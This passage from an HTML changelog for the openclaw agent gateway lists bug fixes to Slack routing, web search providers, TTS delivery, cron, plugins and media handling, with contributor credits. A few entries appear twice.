<p>Gateway/chat history: merge Claude CLI transcript imports for Anthropic-routed sessions that still have a Claude CLI binding, so local chat history does not hide CLI JSONL turns. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367073060" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75850" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75850/hovercard" href="https://github.com/openclaw/openclaw/issues/75850">#75850</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alfredjbclaw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alfredjbclaw">@alfredjbclaw</a>.</p>
</li>
<li>
<p>Media: trim serialized JSON suffixes after local <code>MEDIA:</code> directive file extensions, so generated-image metadata cannot pollute the parsed media path and cause false <code>ENOENT</code> delivery failures. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4360047482" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75182" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75182/hovercard" href="https://github.com/openclaw/openclaw/issues/75182">#75182</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TnzGit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TnzGit">@TnzGit</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>.</p>
</li>
<li>
<p>Plugins/runtime: hot-reload Gateway plugin runtime surfaces after plugin enable/disable changes while keeping source-changing plugin install, update, and uninstall operations restart-backed so loaded module code is not reused. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4330564867" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72097" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72097/hovercard" href="https://github.com/openclaw/openclaw/issues/72097">#72097</a>.</p>
</li>
<li>
<p>Cron: make scheduler reload schedule comparison tolerate malformed persisted jobs, so one bad cron entry no longer aborts the whole tick. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367497925" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75886" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75886/hovercard" href="https://github.com/openclaw/openclaw/issues/75886">#75886</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/samfox-ai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/samfox-ai">@samfox-ai</a>.</p>
</li>
<li>
<p>Doctor/channels: warn after migrations when default Telegram or Discord accounts have no configured token and their env fallback (<code>TELEGRAM_BOT_TOKEN</code> or <code>DISCORD_BOT_TOKEN</code>) is unavailable, with secret-safe migration docs for checking state-dir <code>.env</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350080379" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74298" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74298/hovercard" href="https://github.com/openclaw/openclaw/issues/74298">#74298</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lolaopenclaw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lolaopenclaw">@lolaopenclaw</a>.</p>
</li>
<li>
<p>Gateway/diagnostics: keep idle liveness samples in telemetry instead of visible warning logs unless diagnostic work is active, waiting, or queued. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Channels/cron: reject provider-prefixed targets for the wrong channel and let prefixed announce targets such as <code>telegram:123</code> select their channel when delivery falls back to <code>last</code>, so Telegram IDs cannot be coerced into WhatsApp phone numbers. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4162988650" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56839" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/56839/hovercard" href="https://github.com/openclaw/openclaw/issues/56839">#56839</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bencoremans/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bencoremans">@bencoremans</a>.</p>
</li>
<li>
<p>Control UI/chat: keep live replies visible when a raw session alias such as <code>main</code> sends the chat turn but Gateway emits events under the canonical session key for the same run. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345216396" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73716" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73716/hovercard" href="https://github.com/openclaw/openclaw/issues/73716">#73716</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teebes/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teebes">@teebes</a>.</p>
</li>
<li>
<p>CLI/models: reject <code>--agent</code> on <code>openclaw models set</code> and <code>set-image</code> instead of silently writing agent-scoped requests to global model defaults. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4286636018" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68391" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68391/hovercard" href="https://github.com/openclaw/openclaw/issues/68391">#68391</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/derrickabellard/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/derrickabellard">@derrickabellard</a>.</p>
</li>
<li>
<p>CLI: stop treating the legacy singular <code>openclaw tool ...</code> token as a plugin id under restrictive <code>plugins.allow</code>, so it falls through as a normal unknown/reserved command instead of suggesting a stale allowlist entry. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4243981916" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64732" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64732/hovercard" href="https://github.com/openclaw/openclaw/issues/64732">#64732</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/efe-arv/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/efe-arv">@efe-arv</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SweetSophia/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SweetSophia">@SweetSophia</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hashtag1974/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hashtag1974">@hashtag1974</a>.</p>
</li>
<li>
<p>Media: write inbound media buffers through same-directory temp files before rename, so failed disk writes do not leave zero-byte artifacts for later voice transcription. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4154946745" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55966" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/55966/hovercard" href="https://github.com/openclaw/openclaw/issues/55966">#55966</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OpenCodeEngineer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OpenCodeEngineer">@OpenCodeEngineer</a>.</p>
</li>
<li>
<p>TTS/Telegram: keep trusted local audio generated by the TTS tool queued for voice-note delivery even when the run-level built-in tool list omits the raw <code>tts</code> name. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354905008" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74752" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74752/hovercard" href="https://github.com/openclaw/openclaw/issues/74752">#74752</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Loveworld3033/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Loveworld3033">@Loveworld3033</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/andyliu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/andyliu">@andyliu</a>.</p>
</li>
<li>
<p>TTS: require explicit user or config audio intent for the agent speech tool so dashboard chats stay text unless audio is requested. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4303803702" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69777" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69777/hovercard" href="https://github.com/openclaw/openclaw/issues/69777">#69777</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alexandre-leng/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alexandre-leng">@alexandre-leng</a>.</p>
</li>
<li>
<p>Plugins/config: keep bundled source-checkout plugins from being runtime-gated by install-only <code>minHostVersion</code> metadata, accept prerelease host floors, trim plugin-service startup failures to one log line, and avoid broad channel-runtime loading during base config parsing. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Heartbeat: strip legacy <code>[TOOL_CALL]...[/TOOL_CALL]</code> and <code>[TOOL_RESULT]...[/TOOL_RESULT]</code> pseudo-call blocks from heartbeat replies before channel delivery. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4131762668" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54138" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/54138/hovercard" href="https://github.com/openclaw/openclaw/issues/54138">#54138</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Deniable9570/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Deniable9570">@Deniable9570</a>.</p>
</li>
<li>
<p>macOS/Voice Wake: send wake-word and Push-to-Talk transcripts through the selected macOS session target instead of always falling back to main WebChat. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4107671050" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51040" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/51040/hovercard" href="https://github.com/openclaw/openclaw/issues/51040">#51040</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/carl-jeffrolc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/carl-jeffrolc">@carl-jeffrolc</a>.</p>
</li>
<li>
<p>Providers/xAI: give Grok <code>web_search</code> a 60s default timeout, harden malformed xAI Responses parsing, and return structured timeout errors instead of aborting the tool call. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4175237199" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58063" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58063/hovercard" href="https://github.com/openclaw/openclaw/issues/58063">#58063</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4183930735" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58733" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58733/hovercard" href="https://github.com/openclaw/openclaw/issues/58733">#58733</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dnishimura/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dnishimura">@dnishimura</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/marvcasasola-svg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/marvcasasola-svg">@marvcasasola-svg</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nanako0129/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nanako0129">@Nanako0129</a>.</p>
</li>
<li>
<p>Providers/configure: preserve the existing default model when adding or reauthing a provider whose plugin returns a default-model config patch. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4099627324" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/50268" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/50268/hovercard" href="https://github.com/openclaw/openclaw/issues/50268">#50268</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rixcorp-oc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rixcorp-oc">@rixcorp-oc</a>.</p>
</li>
<li>
<p>Slack/message actions: send media before the follow-up Block Kit message when Slack <code>send</code> includes a file plus presentation or interactive controls, so file attachments are no longer rejected. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4111591995" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51458" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/51458/hovercard" href="https://github.com/openclaw/openclaw/issues/51458">#51458</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/HirokiKobayashi-R/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/HirokiKobayashi-R">@HirokiKobayashi-R</a>.</p>
</li>
<li>
<p>Slack/DMs: honor <code>dmHistoryLimit</code> for fresh 1:1 Slack DM sessions by backfilling recent conversation history before the current reply. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4240708914" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64427" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64427/hovercard" href="https://github.com/openclaw/openclaw/issues/64427">#64427</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/brantley-creator/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/brantley-creator">@brantley-creator</a>.</p>
</li>
<li>
<p>Slack/DMs: keep top-level direct messages on the stable DM session even when <code>replyToMode</code> targets Slack thread replies, preserving context across DM turns. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4184870759" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58832" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58832/hovercard" href="https://github.com/openclaw/openclaw/issues/58832">#58832</a>. Thanks @daye-jjeong.</p>
</li>
<li>
<p>Slack/delivery: preserve Slack Web API missing-scope details in outbound delivery errors, so queued retry state identifies the OAuth scope to add. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4216375787" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62391" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62391/hovercard" href="https://github.com/openclaw/openclaw/issues/62391">#62391</a>. Thanks @alexey-pelykh.</p>
</li>
<li>
<p>Slack/capabilities: read granted scopes from <code>auth.test</code> response metadata before trying legacy scope APIs, so modern bot tokens no longer report <code>unknown_method</code> for channel capabilities. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4068646797" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44625" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44625/hovercard" href="https://github.com/openclaw/openclaw/issues/44625">#44625</a>. Thanks @Qquanwei and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/martingarramon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/martingarramon">@martingarramon</a>.</p>
</li>
<li>
<p>Slack/DMs: send text/block-only proactive DMs directly with <code>chat.postMessage(channel=&lt;user id&gt;)</code> while keeping conversation resolution for uploads and threaded sends. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4213098355" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62042" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62042/hovercard" href="https://github.com/openclaw/openclaw/issues/62042">#62042</a>. Thanks @MarkMolina.</p>
</li>
<li>
<p>Slack/routing: match route bindings written with Slack target syntax such as <code>channel:C...</code>, <code>user:U...</code>, or <code>&lt;@U...&gt;</code>, so bound Slack peers route to the configured agent instead of <code>main</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4048907648" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/41608" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/41608/hovercard" href="https://github.com/openclaw/openclaw/issues/41608">#41608</a>. Thanks @Winnsolutionsadmin.</p>
</li>
<li>
<p>Slack/routing: match public-channel allowlist entries written as <code>channel:C...</code> against bare Slack runtime channel IDs, so allowed channel mentions do not fail as <code>channel-not-allowed</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4046643845" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/41264" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/41264/hovercard" href="https://github.com/openclaw/openclaw/issues/41264">#41264</a> and supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4160915756" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56530" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/56530/hovercard" href="https://github.com/openclaw/openclaw/pull/56530">#56530</a>. Thanks @babutree and @Realworld404.</p>
</li>
<li>
<p>Slack/message actions: prefer the account bound to the outbound target peer before falling back to the agent's first channel account, so multi-workspace sends use the intended Slack account. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4264751663" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66807" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/66807/hovercard" href="https://github.com/openclaw/openclaw/pull/66807">#66807</a>. Thanks @rijhsinghani.</p>
</li>
<li>
<p>Slack/delivery: retry Slack Web API writes only when the SDK wraps a DNS request failure such as <code>EAI_AGAIN</code>, so transient resolver hiccups can recover without retrying platform errors that may duplicate messages. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4289779783" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68789" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68789/hovercard" href="https://github.com/openclaw/openclaw/issues/68789">#68789</a>. Thanks @sonnyb9.</p>
</li>
<li>
<p>Slack/message actions: forward agent-scoped media roots through the bundled upload-file action path, so workspace files can be attached without failing the local-media guard. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4242973170" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64625" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64625/hovercard" href="https://github.com/openclaw/openclaw/issues/64625">#64625</a>. Thanks @benpchandler.</p>
</li>
<li>
<p>Slack/mentions: resolve <code>&lt;!subteam^...&gt;</code> user-group mentions through Slack <code>usergroups.users.list</code> and treat them as explicit mentions only when the bot user is a member, so mention-gated agent channels wake for real user-group mentions without config-only allowlists. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346503795" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73827" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73827/hovercard" href="https://github.com/openclaw/openclaw/issues/73827">#73827</a>. Thanks @CG-Intelligence-Agent-Jack.</p>
</li>
<li>
<p>Slack/message tool: let <code>read</code> fetch an exact Slack message timestamp, including a specific thread reply when paired with <code>threadId</code>, instead of returning only the parent thread or recent channel history. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4130437054" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/53943" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/53943/hovercard" href="https://github.com/openclaw/openclaw/issues/53943">#53943</a>. Thanks @zomars.</p>
</li>
<li>
<p>PDF/Gemini: send native PDF analysis API keys in the <code>x-goog-api-key</code> header instead of the request URL, keeping secrets out of proxy and access logs. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4202693803" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60600" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/60600/hovercard" href="https://github.com/openclaw/openclaw/pull/60600">#60600</a>. Thanks @garagon.</p>
</li>
<li>
<p>Web search/Gemini: route agent abort signals into provider fetches and log provider-side abort failures as normal tool errors instead of silently aborting the run. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4338236726" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72995" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72995/hovercard" href="https://github.com/openclaw/openclaw/issues/72995">#72995</a>. Thanks @RoseKongPS.</p>
</li>
<li>
<p>Web search: point missing-key errors to <code>web_fetch</code> for known URLs and the browser tool for interactive pages. Thanks @zhaoyang97.</p>
</li>
<li>
<p>Web search: late-bind managed agent <code>web_search</code> calls to the current runtime config snapshot, so existing sessions do not keep stale unresolved SecretRefs after secrets reload. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362762607" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75420" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75420/hovercard" href="https://github.com/openclaw/openclaw/issues/75420">#75420</a>. Thanks @richardmqq.</p>
</li>
<li>
<p>Web search/Gemini: reuse <code>models.providers.google.apiKey</code> and <code>models.providers.google.baseUrl</code> as lower-priority fallbacks for Gemini web search after dedicated search config and <code>GEMINI_API_KEY</code>. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4167524438" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/57496" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/57496/hovercard" href="https://github.com/openclaw/openclaw/pull/57496">#57496</a>. Thanks @Aoiujz.</p>
</li>
<li>
<p>Web search/Gemini: pass <code>freshness</code> and <code>date_after</code>/<code>date_before</code> filters through Google Search grounding time ranges. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4261488656" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66498" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66498/hovercard" href="https://github.com/openclaw/openclaw/issues/66498">#66498</a>. Thanks @ismael-81.</p>
</li>
<li>
<p>Web search/DuckDuckGo: include the keyless DuckDuckGo provider in the web search setup wizard. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4253504720" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65862" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65862/hovercard" href="https://github.com/openclaw/openclaw/issues/65862">#65862</a> and supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4254540581" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65940" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/65940/hovercard" href="https://github.com/openclaw/openclaw/pull/65940">#65940</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Jah-yee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Jah-yee">@Jah-yee</a>.</p>
</li>
<li>
<p>Web search: honor <code>baseUrl</code> overrides for Gemini, Grok, and x_search provider-owned config, so proxy-backed search tools no longer dial hardcoded public endpoints. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4212565688" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61972" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/61972/hovercard" href="https://github.com/openclaw/openclaw/pull/61972">#61972</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Lanfei/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Lanfei">@Lanfei</a>.</p>
</li>
<li>
<p>Web search/Brave: point Brave provider metadata at the canonical <code>/tools/brave-search</code> docs page and make the legacy <code>/brave-search</code> docs page a redirect stub. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4253527816" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65870" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65870/hovercard" href="https://github.com/openclaw/openclaw/issues/65870">#65870</a> and supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4253794124" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65892" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/65892/hovercard" href="https://github.com/openclaw/openclaw/pull/65892">#65892</a>. Thanks @Magicray1217 and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Jah-yee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Jah-yee">@Jah-yee</a>.</p>
</li>
<li>
<p>Web search/Brave: allow <code>freshness</code> and bounded date ranges in <code>llm-context</code> mode, matching Brave's documented LLM Context API support. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4107380876" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51005" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/51005/hovercard" href="https://github.com/openclaw/openclaw/pull/51005">#51005</a>. Thanks @remusao.</p>
</li>
<li>
<p>Web fetch: resolve external plugin <code>webFetchProviders</code> for non-sandboxed <code>web_fetch</code>, while keeping sandboxed fetches limited to bundled providers. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355873723" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74915" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74915/hovercard" href="https://github.com/openclaw/openclaw/issues/74915">#74915</a>. Thanks @ultrahighsuper and @mingmingtsao.</p>
</li>
<li>
<p>Heartbeat: strip legacy <code>[TOOL_CALL]...[/TOOL_CALL]</code> and <code>[TOOL_RESULT]...[/TOOL_RESULT]</code> pseudo-call blocks from heartbeat replies before channel delivery. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4131762668" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54138" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/54138/hovercard" href="https://github.com/openclaw/openclaw/issues/54138">#54138</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Deniable9570/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Deniable9570">@Deniable9570</a>.</p>
</li>
<li>
<p>macOS/Voice Wake: send wake-word and Push-to-Talk transcripts through the selected macOS session target instead of always falling back to main WebChat. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4107671050" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51040" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/51040/hovercard" href="https://github.com/openclaw/openclaw/issues/51040">#51040</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/carl-jeffrolc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/carl-jeffrolc">@carl-jeffrolc</a>.</p>
</li>
<li>
<p>Providers/xAI: give Grok <code>web_search</code> a 60s default timeout, harden malformed xAI Responses parsing, and return structured timeout errors instead of aborting the tool call. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4175237199" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58063" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58063/hovercard" href="https://github.com/openclaw/openclaw/issues/58063">#58063</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4183930735" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58733" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58733/hovercard" href="https://github.com/openclaw/openclaw/issues/58733">#58733</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dnishimura/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dnishimura">@dnishimura</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/marvcasasola-svg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/marvcasasola-svg">@marvcasasola-svg</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nanako0129/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nanako0129">@Nanako0129</a>.</p>
</li>
<li>
